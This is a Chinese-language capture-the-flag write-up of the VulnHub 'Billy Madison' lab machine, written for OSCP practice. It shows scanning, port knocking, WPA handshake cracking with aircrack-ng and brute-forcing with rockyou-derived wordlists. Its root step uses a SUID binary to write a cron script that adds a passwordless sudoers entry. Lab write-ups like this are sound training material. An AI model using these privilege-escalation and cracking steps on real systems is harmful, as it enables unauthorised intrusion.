MentalityXt
MentalityXt

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试

仅以此文来记录我的oscp靶场训练过程 

Billy Madison: 1.1 ~ VulnHub

拿到了靶机之后改为桥接导入VMware

kali和靶机全部上线后,nmap扫描 192.168.165.0/24 

发现靶机ip为192.168.165.156

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第1张图片

 hping3

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第2张图片

nmap

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第3张图片

 先跑一下ssh的弱口令 虽然没啥用

ef73a168d77a45b8a9a0a48ed2024996.png

ncat -v 192.168.165.156 23

获取到了一些信息

2b4e1a0a80b44cff90292e6bd947f866.png

 获取到了一个密码rkfpuzrahngvat 及解密方式ROT

随便找了个解密网站CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

ROT13出来为 exschmenuating

打开网页访问一下192.168.165.156:69 的 wordpress 但是打不开 有点奇怪 

 

但是不妨碍用wpscan扫一下

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第4张图片

 获取到了一个用户admin

打开网页访问一下192.168.165.156:80

没啥有用的 Billy 可能是一个里面的用户名

dirb 跑一下看看

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第5张图片

翻了翻没发现什么好东西 发现下面的de da 全是不同语言的页面罢了

还有139和445 samba

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第6张图片

发现可以连接到EricsSecretStuff

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第7张图片

基本用法

 get xxxxx     ;下载某个文件
 put xxxxx     ;上传某个文件
 mget *          ;下载当前目录下所有文件
 tar c test.tar notes/   ; 打包notes目录下所有文件

 尝试上传写入文件看看

4ac46d529e19400c801534bb6ec5a89e.png

 不行 尝试下载看看

bd2c051c2a4d440a9554aceb933a11f1.png

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第8张图片

 告诉我们有一个后门

到这貌似只剩下 2525 这个端口

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第9张图片

直到现在没有什么思路了 看看老外的wp

发现之前的 exschmenuating 是一个目录

一个新页面  得到了一个信息 veronica 会以的名字的一部分 作为她的文件名 突然就想到了rockyou.txt  查看日志 发现我的ip被禁了 貌似是因为连接23端口

808685343ac34c22829004ea870bbe85.png

cat /usr/share/wordlists/rockyou.txt | grep -i veronica > /home/kali/Desktop/111.txt

使用grep 导出 rockyou 含有 veronica 的字典 然后dirb爆破

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第10张图片

找到了 下载下来 使用wireshark 打开

 总共6个邮件 都是发往2525端口的

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: [email protected]
From: [email protected]
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just click here to install it, k?  

Thanks. -Eric


.
QUIT


EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

https://www.youtube.com/watch?v=z5YU7JwVy7s

-VV


.
QUIT


EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V


.
QUIT
 

通过对话得知 这个 eric 骗 Veronica 下载了个病毒软件 并且还有个ftp服务器 除非连接到 Spanish Armada ???   账号密码为 eric  ericdoesntdrinkhisownpee.

打开 https://www.youtube.com/watch?v=z5YU7JwVy7s 开始英语听力 

大致意思是 1066 1215 Spanish Armada 1466 67 1469 1514 1981 1986 Please do not do that

用 shell 敲击一下端口

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn -host-timeout 201 -max-retries 0 -p $x 192.168.165.156; done

21端口打开可以连接了 使用之前的账号密码 发现有问题 后来百度了一下 输入 passive 即可正常

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第11张图片

get .notes 下载下来打开后显示如下 其他的下载下来有点看不懂

Ugh, this is frustrating.  I managed to make a system account for myself. I also managed to hide Billy's paperwhere he'll never find it.  However, now I can't find it either :-(. To make matters worse, my privesc exploits aren't working.  One sort of worked, but I think I have it installed all backwards.If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper!Fortunately, my SSH backdoor into the system IS working.  All I need to do is send an email that includesthe text: "My kid will be a ________ _________"Hint: https://www.youtube.com/watch?v=6u7RsW5SAgsThe new secret port will be open and then I can login from there with my wifi password, which I'msure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time tocheck Veronica's.-EG

大致意思就是说 需要知道一个wifi密码 我们查看了billy的ftp发现没有 那就只有 Veronica 的ftp有

查看视频发现 空白的话为 My kid will be a Soccer Player 并且需要发送一封电子邮件 可能会开启一个新的ssh端口

联系到之前Veronica 会将他的名字当成密码的一部分 我们爆破一下Veronica的ftp

登录成功后发现了两个文件 eg-01.cap  email-from-billy.eml

email-from-billy.eml 如下

        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)Date: Sat, 20 Aug 2016 12:55:40 -0500To: [email protected]: [email protected]: test Sat, 20 Aug 2016 12:55:40 -0500X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/Eric's wifiHey VV,It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.I wasn't completely successful yet, but at least I got a start.I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)Kisses,Billy

看来Billy 和 Eric 两个人都挺核善的 这个里面没有wifi密码

突然我想起了 之前使用的Aircrack-ng

获取的cap包的命名方式就很像抓到握手包的样子 可以尝试破解一下 这种破解速度很快所以我直接导入了 rockyou.txt 破解

aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt

 OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第12张图片

 直接跑出来了获取到了wifi名称 EricGordon  密码 triscuit*

然后尝试匿名登录 获得如下信息 匿名登录 密码为随便一个邮箱即可

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第13张图片

连接靶机2525端口  模仿之前抓到的cap包的邮件格式发送邮件 将内容更改为

My kid will be a soccer player

发送即可 重新扫描一下 发现目标开启了 

<-  220 BM ESMTP SubEthaSMTP null -> EHLO kali<-  250-BM<-  250-8BITMIME<-  250-AUTH LOGIN<-  250 Ok -> MAIL FROM:<-  250 Ok -> RCPT TO:<-  250 Ok -> DATA<-  354 End data with . -> Date: Thu, 15 Sep 2016 07:57:56 -0400 -> To: [email protected] -> From: [email protected] -> Subject: My kid will be a soccer player -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ -> -> My kid will be a soccer player -> -> .<-  250 Ok -> QUIT<-  221 Bye=== Connection closed with remote host.

或者也可以

swaks --to [email protected] --from [email protected] --server 192.168.165.156:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"

重新扫描一下 发现开启了 1974 端口 开启的openssh 7.2p2

87897d36702147fc9964b6eeab26cd17.png

 searchsploit一下 貌似只有枚举用户可以用

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第14张图片

成功连接 eric 的ssh   准备提权

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第15张图片

find / -user root -perm -4000 -ls 2>/dev/null

发现/usr/local/share/sgml/donpcgd 貌似可以在任何位置创建一个文件

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第16张图片

eric@BM:~$ /usr/local/share/sgml/donpcgd /dev/null /etc/test#### mknod(/etc/testing,21b6,103)eric@BM:~$ ls -lah /etc/testcrw-rw-rw- 1 root root 1, 3 Sep 15 10:22 /etc/testeric@BM:~$ touch /tmp/testeric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test#### mknod(/etc/cron.hourly/test,81b4,0)eric@BM:~$ echo -e '#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/testeric@BM:~$ chmod +x /etc/cron.hourly/testeric@BM:~$ cat /etc/cron.hourly/test#!/bin/bashecho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

预计等一个小时 然后sudo su

f646f20a06f647859a50a6a8dd8cfe75.png

已经获取了root

但是我们还要找Billy的丢失的文件

最后在根目录 /PRIVATE 文件夹找到了点有用的东西

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第17张图片

需要我们使用cewl从 Wikipedia 条目生成一个词表

63aa1e5aa08c4909b42b036689caee46.png

正常来说没有proxy根本生成不了 推荐 proxychains

proxychains cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第18张图片

挂了proxy后生成成功

接下来破解需要 truecrack kali直接安装即可

truecrack -w billy-wiki.list -t BowelMovement

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第19张图片

跑出密码后 最后需要安装 veracrypt  

 openSUSE Software      kali 安装推荐看这篇文章安装 也直接直接使用下面的命令

echo 'deb http://download.opensuse.org/repositories/home:/stevenpusser:/veracrypt/Debian_10/ /' | sudo tee /etc/apt/sources.list.d/home:stevenpusser:veracrypt.listcurl -fsSL https://download.opensuse.org/repositories/home:stevenpusser:veracrypt/Debian_10/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/home_stevenpusser_veracrypt.gpg > /dev/nullsudo apt updatesudo apt install veracrypt

必须要先创建个文件夹再执行命令进去 获得一个zip文件 再解压一次

 解密后得到两个文件

mkdir billyveracrypt -tc BowelMovement billy

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第20张图片

 解压完获得了两个文件

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第21张图片

至此结束了 不得不说还是很有趣的 扩展了思路 感觉很不错的一个靶场 学到了很多命令 最头疼的一点就是21和1974端口 重启靶机之后重新执行命令才能打开

你可能感兴趣的:(oscp,功能测试,网络安全)

  • 架构设计(13)安全架构设计理论 CoderIsArt 架构设计研究安全架构安全
    网络安全设计网络安全架构设计是为了保护信息系统免受各种网络攻击和威胁而进行的系统化设计。它涉及设计网络基础设施、配置安全控制、制定安全策略,以及实施和维护这些策略,以确保数据的机密性、完整性和可用性。下面是网络安全架构设计的详细内容,包括关键组件、设计原则和实际案例。1.网络安全架构设计的关键组件1.1网络边界保护防火墙:用于过滤网络流量,根据设定的安全规则允许或阻止数据包进入或离开网络。分为传统
  • Python3 | 练气期,入门初识与起步! 全栈工程师修炼指南 企业IT运维实践python
    [知识是人生的灯塔,只有不断学习,才能照亮前行的道路]0x00前言简述描述:作为一名网络安全转运维的工程师,每天一睁眼就要马不停蹄的学习各类计算机技术、编程和网络安全知识等,在工作中接触过很多编程语言,比如:C、Java、Python、PHP、Shell、PowerShell等,但都仅仅停留在看得懂一些,会简单使用一些的阶段,却没有去深入的了解过这些语言。正好这才趁着进行机器学习的机会,将Pyth
  • 【网络安全】分析cookie实现PII IDOR 秋说 网络安全web安全漏洞挖掘
    未经许可,不得转载。文章目录正文正文目标:公共电子商务类型的网站,每月有大约6万到10万访问者,注册用户大约有5万。存在一个查询个人资料的端点/GetProfiledetails,以下是完整的请求和响应:我发现,cookie非常类似于base64编码后的结果,于是我将其进行base64解码:可以看到,cookie中存在一个UserID为509071,即我的ID。因此,我将ID参数修改,进行base
  • 算法推荐规制!《互联网信息服务算法推荐管理规定(征求意见稿)》公开征求意见 AIwenIPgeolocation 网络安全
    互联网信息服务算法推荐管理规定(征求意见稿)第一条为了规范互联网信息服务算法推荐活动,维护国家安全和社会公共利益,保护公民、法人和其他组织的合法权益,促进互联网信息服务健康发展,弘扬社会主义核心价值观,根据《中华人民共和国网络安全法》、《中华人民共和国数据安全法》、《中华人民共和国个人信息保护法》、《互联网信息服务管理办法》等法律、行政法规,制定本规定。第二条在中华人民共和国境内应用算法推荐技术提
  • 【网络安全】WordPress Uncontrolled Resource Consumption 秋说 网络安全web安全漏洞挖掘wordpress
    未经许可,不得转载。文章目录WordPresswp-cron.php实战漏洞危害解决措施WordPressWordPress是全球最广泛使用的内容管理系统(CMS),目前约有43%的网站依赖于它。由于其用户友好的界面和丰富的插件功能,WordPress成为了全球最受欢迎的CMS。然而,在使用WordPress的过程中,用户常常忽视一些潜在的配置问题,其中之一就是wp-cron.php文件的设置。w
  • CBK-D4-通信与网络安全、访问控制.md 青葱味奶糖 CISSP网络安全访问控制cissp通信与网络安全访问控制
    CBK-D4-通信与网络安全、访问控制安全网络架构和组件OSI模型–20世纪70年代开发出来,1984年正式作为ISO标准7498发布应用层、表示层、会话层、传输层、网络层、数据链路层、物理层。应表会传网数物封装和解封,数据从物理层到应用层向上移动时被称为解封,向下移动被称为封装。对等层通信,应表会层是PDU,协议数据单元。传输层是TCP/UDP,段或数据报。网络层是数据包,数据链路层是帧,物理层
  • 探索安全的边界:深入解析CVE-2023-7028——GitLab账户接管漏洞 邹澜鹤Gardener
    探索安全的边界:深入解析CVE-2023-7028——GitLab账户接管漏洞在网络安全的最前沿,总有那么一些发现让整个社区为之一震。今天,我们将聚焦于一个引人注目的安全漏洞——CVE-2023-7028,这是一个针对GitLab平台的账户接管(AccountTake-Over)漏洞。本文旨在通过深入浅出的技术分析和场景探讨,为您提供对这一重要安全问题的理解,并非鼓励任何非法操作,而是增强我们对于
  • 人工智能在网络安全领域的应用探索 亿林数据 人工智能web安全安全网络安全
    随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。一、人工智能在网络安全中的应用现状威胁检测与响应人工智能通过机器学习算法,能够自动识别网络中的异常行为,如未经授权的访问、恶意软件传播等。传统的安全系统依赖于静态规则和签
  • 2024网络安全学习路线 非常详细 推荐学习 白帽黑客-晨哥 web安全学习安全数据库php
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊,学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间,光语言都有几门,有些人会倒在学习linux系统及命令的路上,更多的人会倒在学习语言上;2、知识点掌握程度不清楚对于网络安全基础内容,很多人不清楚需要学到什么程度,囫囵吞枣,导致在基础上花费太多时间;看到很多小伙伴,买了HTML,PHP,数据库,计算机
  • 网络安全总结① 无泡汽水 网络面试网络安全
    上一篇:网络工程面试题②下一篇:网络安全总结②信息安全信息安全的定义防止任何对数据进行未授权访问的措施,或者防止造成信息有意无意泄漏、破坏、丢失等问题的发生,让数据处于远离危险、免于威胁的状态或特性。信息安全的脆弱性协议栈自身的脆弱性缺乏数据源验证机制,缺乏完整性验证机制,缺乏机密性保障机制(可以抓包)操作系统的自身漏洞人为:在程序编写过程中,为实现不可告人的目的,在程序代码的隐藏处保留后门硬件:
  • IP地址与SSL证书:保障网络安全的关键 alsknv 网络tcp/ipweb安全https运维网络协议ssl
    在数字时代,网络安全至关重要,而SSL(安全套接层)证书作为加密用户与服务器之间数据传输的利器,扮演着不可或缺的角色。然而,谈及SSL证书时,一个常见的误区是它们通常与域名绑定,而非直接关联到IP地址。尽管如此,了解IP地址与SSL证书的关系及其使用场景,对于构建安全的网络环境同样重要。IP地址与SSL证书的基本差异IP地址:是互联网中设备的唯一数字标识,用于网络间的通信。它像是一个电话号码,让数
  • 【网络安全】SQL注入详解 白袍无涯 sqlweb安全数据库网络安全系统安全
    一、什么是sql注入SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1:寻找到SQL注入的位置2:判断服务器类型和后台数据库类型3:针对不同的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例Stringsql="select*fromuser_tablew
  • 【系统架构设计师】论文:论SOA面向服务架构技术的应用 数据知道 软考高级-系统架构设计师系统架构架构软考高级系统架构设计师面向服务架构SOA
    论文:论SOA面向服务架构技术的应用文章目录摘要正文总结摘要本人于2020年7月参加国内某某知名港口供电业务系统的开发工作,在该项目中主要担任系统架构师,主要负责该系统架构和网络安全体系架构设计。经过近20年的港口信息化建设,港口供电系统已经建立了一些应用系统,但是,随着港口供电业务的发展,有些系统已经无法满足目前供电业务需求,同时存在已经开发的系统之间信息共享能力弱,系统集成度较低,系统扩展难的
  • 速盾:高防CDN支持端口转发吗? 速盾cdn 网络
    高防CDN通常用于保护网站免受DDoS攻击和其他网络安全威胁。在这种情况下,它主要通过分发网站流量到全球分布的服务器来分担流量压力,提高网站的可用性和性能。高防CDN主要通过HTTP和HTTPS协议来加速网站,因此它通常只支持这两种协议的端口转发。具体来说,它可以将网站的HTTP或HTTPS流量转发到源服务器的指定端口上。在传统的CDN架构中,端口转发主要是通过将访问端口映射到源服务器的相应端口来
  • 网络安全售前入门05安全服务——渗透测试服务方案 努力工作的网安人 网络安全web安全安全经验分享网络安全
    目录1.服务概述2.测试内容2.1网络层安全2.2系统层安全2.3应用层安全3.测试范围4.漏洞分级5.渗透用例6.测试风险6.1风险说明6.2风险规避6.3数据备份7.服务输出1.服务概述渗透性测试是对安全情况最客观、最直接的评估方式,主要是模拟黑客的攻击方法对系统和网络进行非破坏性质的攻击性测试,目的是侵入系统,获取系统控制权并将入侵的过程和细节产生报告给用户,由此证实用户系统所存在的安全威胁
  • 网络安全售前入门07安全服务——主机漏洞扫描服务方案 努力工作的网安人 网络安全安全经验分享网络安全
    目录1.服务概述2.服务内容3.服务输出1.服务概述漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。2.服务内容本项目针对客户方系统主机、网络设备、数据库系统及云平台和虚拟化平台等,具体如下:类型具体对象扫描内容操作系统Windows操作系统包括但不限于:windowsxp/2000/2003/2008,包括32位和64位。Linux/Uni
  • 网络安全售前入门08安全服务——Web漏洞扫描服务 努力工作的网安人 安全服务安全web安全前端网络安全经验分享
    目录1.服务概述2.服务内容2.1代码层安全2.2应用层安全3.服务工具4.服务输出1.服务概述Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASPTOP10等主流安全漏洞。2.服务内容2.1代码层安全应用程序及代码在开发过程中,
  • 小白如何快速入门网络安全里,主要岗位有哪些? baimao__沧海 web安全安全linuxtcpdump运维java
    入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等,每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低,也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程网络安全主要岗位有哪些安全领域技术方向分类渗透测试学习路线小白如何快速入门一、网络安全里的主要的岗位有哪些:渗透测试工程师:主要是模拟黑客对目标业务系统进行攻击,点到为止安全运
  • 功能测试常用的测试用例大全 测试界晓晓 软件测试功能测试测试用例oracle自动化测试软件测试程序人生职场和发展
    登录、添加、删除、查询模块是我们经常遇到的,这些模块的测试点该如何考虑1)登录①用户名和密码都符合要求(格式上的要求)②用户名和密码都不符合要求(格式上的要求)③用户名符合要求,密码不符合要求(格式上的要求)④密码符合要求,用户名不符合要求(格式上的要求)⑤用户名或密码为空⑥数据库中不存在的用户名,不存在的密码⑦数据库中存在的用户名,错误的密码⑧数据库中不存在的用户名,存在的密码⑨输入的数据前存在
  • 软件测试——论坛系统测试用例 Xxxeel 软件测试软件测试报告测试用例功能测试
    功能测试其他测试测试用例用例编号用例描述优先级预置条件操作步骤测试数据预期结果测试结果BugID软件版本测试员SNS_User_Register_001注册成功使用合法的数据成功注册一个新账号P11、已打开注册页面2、准备一个未注册用户信息1、输入用户昵称2、输入用户名3、输入密码4、确认密码5、输入手机号码6、输入验证码7、输入邮箱8、点击注册按钮1、用户昵称:User12、用户名:测试用户13
  • 速盾:深入理解高防CDN的定义、功能与应用 速盾cdn web安全linux安全
    高防CDN(ContentDeliveryNetwork)是一种基于分布式架构的网络加速和安全防护技术,目的是提供高效的内容传输和抵御网络攻击的能力。它通过在全球各地部署服务器节点,将内容缓存到离用户最近的节点,从而实现快速的内容传输。同时,高防CDN还通过识别和过滤恶意流量,提供网络安全保护,阻止DDoS攻击和其他恶意行为。高防CDN的主要功能包括:内容加速:通过缓存静态内容,如图片、视频和网页
  • 速盾:如何选择适合企业的高防 IP 和 CDN? 速盾cdn 网络安全web安全
    在当前互联网时代,企业面临着越来越多的网络安全威胁,其中之一就是DOS/DDOS攻击。为了保护企业的在线业务,很多企业都会选择使用高防IP和CDN服务。然而,如何选择适合企业的高防IP和CDN服务呢?下面是一些关键因素可以帮助企业做出明智的选择。首先,企业需要了解自己的网络安全需求。不同企业的业务规模和风险程度不同,因此需要的防护水平也会有所不同。一些企业可能只需要基本的防护,而另一些企业可能需要
  • 全球高级持续威胁:网络世界的隐形战争 紫队安全研究 网络运维安全
    背景在当今数字化时代,网络安全已经成为全球各国政府、企业和个人面临的最紧迫问题之一。高级持续威胁(APT,AdvancedPersistentThreats)是网络攻击中最复杂、最隐蔽、最具破坏力的一种形式。APT攻击者通常由国家支持或具备高度专业技能,他们使用复杂的策略和工具,长期潜伏在目标网络中,窃取敏感信息、破坏关键基础设施或获取经济利益。近年来,APT攻击事件频发,涉及多个国家和行业,造成
  • 软件测试笔记|功能测试基础|你们公司的测试环境是怎么划分的?有几种测试环境? 阳哥整理软件测试笔记 功能测试基础功能测试
    在我们公司,测试环境通常有以下几种划分:一、开发环境开发环境主要由开发人员使用,用于在开发过程中进行代码调试和单元测试。测试人员有时也会在开发环境中进行一些初步的功能验证,以便及时与开发人员沟通问题。但开发环境通常不太稳定,不适合进行全面的系统测试。二、测试环境1.集成测试环境:•用于对各个模块进行集成测试,验证模块之间的接口和交互是否正常。•通常会尽可能模拟生产环境的配置,但数据量可能相对较小。
  • Microsoft 将在 CrowdStrike 服务中断后举办 Windows 安全峰会 H_kiwi microsoft安全网络安全安全威胁分析开发语言网络php
    随着网络安全威胁不断升级,全球范围内的企业和组织正面临前所未有的安全挑战。近期,知名网络安全公司CrowdStrike的服务中断事件引发了广泛关注。据悉,该事件导致了一系列严重后果,包括航班取消、医院运作延误,以及财富500强公司约54亿美元的经济损失。为了应对此次事件并防止类似事件的再次发生,微软宣布将于9月10日举办“Windows端点安全生态系统峰会”。此次峰会将联合CrowdStrike等
  • 信息安全基础复习 星河如雨落 信息安全基础系统安全网络安全网络安全
    期末复习重点难点归纳第一章1网络安全保护的对象:软件、硬件、信息2网络安全的五个属性:机密性、完整性、可用性、可靠性、不可抵赖(可可不完机)3主动攻击和被动攻击的区别?DDOS属于什么攻击?。主动攻击:中断,篡改,伪造被动攻击:截获DDOS:分布式拒绝访问(主动攻击)被动:被动威胁是对信息进行监听,而不对其进行篡改和破坏主动:主动威胁是对信息进行故意篡改和破坏,使合法用户得不到可用的信息。4P2D
  • 信息安全--网络安全体系与安全模型(一) 魔同 信息安全网络安全网络安全
    网络安全体系概述■网络安全体系是网络安全保证系统的最高层概念抽象,是由各种网络安全单元按照一定的规则组成,共同实现网络安全的目标。网络安全体系包括法律法规政策文件、安全策略、组织管理、技术措施、标准规范、安全建设与运营、人员队伍、教育培训、产业生态、安全投入等多种要素。■网络安全体系特征:整体性、协同性、过程性、全面性、适应性。特征内容整体性网络安全体系从全局、长远的角度实现安全保障,网络安全单元
  • Nginx负载均衡中的连接升级至SSL:配置指南与最佳实践 2402_85758936 nginx负载均衡ssl
    在网络安全日益受到重视的今天,使用SSL/TLS加密Web流量已成为标准做法。Nginx作为一个高性能的HTTP服务器和反向代理,提供了丰富的配置选项来支持SSL连接。连接升级至SSL意味着客户端可以通过一个初始的非加密连接与服务器建立通信,然后升级到加密的SSL连接。本文将详细介绍如何在Nginx负载均衡中配置连接升级至SSL,包括证书配置、负载均衡策略和安全性考虑。1.SSL连接升级的重要性S
  • 企业产品网络安全日志8月26日-威胁感知建设,三方漏洞升级 dalerkd 企业产品网络安全建设实录漏洞分析深造之旅web安全
    在做威胁事件感知的建设工作其中工作之一是打通AWSDNSFirewall与SecurityHub。当发生威胁事件时,SecurityHub能接收到情报通知。两者不能直通,需要使用lambda进行触发。三方依赖组件漏洞升级三方依赖组件漏洞升级,无论对于哪个公司都是一个挑战性的事情。逐步升级也是对现有产品的一个负责。我们和开发对漏洞做了划分列表,基本上分为了三类:1明确有风险的2当前方法未触发风险,但
  • 突发性网络攻击的安全挑战分析 go_to_hacker 安全网络
    “网络战争对21世纪的意义可能就如同闪电战对20世纪的意义一样”,突发性网络攻击作为网络战争的新兴形式,对于世界来说仍是国家安全领域的新问题,对网络安全治理带来了不可忽视的严峻挑战。第一,结合当下的战略背景,突发性网络攻击的受害者往往是世界上具有影响力的大国。网络攻击是一种成本较低的战争替代办法,因此大国将在防范突发性网络攻击与实现有效网络安全治理方面投入更多的资源和精力。根据目前的世界格局,国与
  • html页面js获取参数值 0624chenhong html
    1.js获取参数值js function GetQueryString(name) {      var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");      var r = windo
  • MongoDB 在多线程高并发下的问题 BigCat2013 mongodbDB高并发重复数据
    最近项目用到 MongoDB , 主要是一些读取数据及改状态位的操作. 因为是结合了最近流行的 Storm进行大数据的分析处理,并将分析结果插入Vertica数据库,所以在多线程高并发的情境下, 会发现 Vertica 数据库中有部分重复的数据. 这到底是什么原因导致的呢?笔者开始也是一筹莫 展,重复去看 MongoDB 的 API , 终于有了新发现 : com.mongodb.DB 这个类有
  • c++ 用类模版实现链表(c++语言程序设计第四版示例代码) CrazyMizzz 数据结构C++
    #include<iostream> #include<cassert> using namespace std; template<class T> class Node { private: Node<T> * next; public: T data;
  • 最近情况 麦田的设计者 感慨考试生活
       在五月黄梅天的岁月里,一年两次的软考又要开始了。到目前为止,我已经考了多达三次的软考,最后的结果就是通过了初级考试(程序员)。人啊,就是不满足,考了初级就希望考中级,于是,这学期我就报考了中级,明天就要考试。感觉机会不大,期待奇迹发生吧。这个学期忙于练车,写项目,反正最后是一团糟。后天还要考试科目二。这个星期真的是很艰难的一周,希望能快点度过。   
  • linux系统中用pkill踢出在线登录用户 被触发 linux
    由于linux服务器允许多用户登录,公司很多人知道密码,工作造成一定的障碍所以需要有时踢出指定的用户 1/#who   查出当前有那些终端登录(用 w 命令更详细) # who root     pts/0        2010-10-28 09:36 (192
  • 仿QQ聊天第二版 肆无忌惮_ qq
    在第一版之上的改进内容:  第一版链接: http://479001499.iteye.com/admin/blogs/2100893   用map存起来号码对应的聊天窗口对象,解决私聊的时候所有消息发到一个窗口的问题. 增加ViewInfo类,这个是信息预览的窗口,如果是自己的信息,则可以进行编辑.   信息修改后上传至服务器再告诉所有用户,自己的窗口
  • java读取配置文件 知了ing
    1,java读取.properties配置文件 InputStream in; try { in = test.class.getClassLoader().getResourceAsStream("config/ipnetOracle.properties");//配置文件的路径 Properties p = new Properties()
  • __attribute__ 你知多少? 矮蛋蛋 C++gcc
    原文地址: http://www.cnblogs.com/astwish/p/3460618.html GNU C 的一大特色就是__attribute__ 机制。__attribute__ 可以设置函数属性(Function Attribute )、变量属性(Variable Attribute )和类型属性(Type Attribute )。 __attribute__ 书写特征是:
  • jsoup使用笔记 alleni123 java爬虫JSoup
    <dependency> <groupId>org.jsoup</groupId> <artifactId>jsoup</artifactId> <version>1.7.3</version> </dependency> 2014/08/28 今天遇到这种形式,
  • JAVA中的集合 Collectio 和Map的简单使用及方法 百合不是茶 listmapset
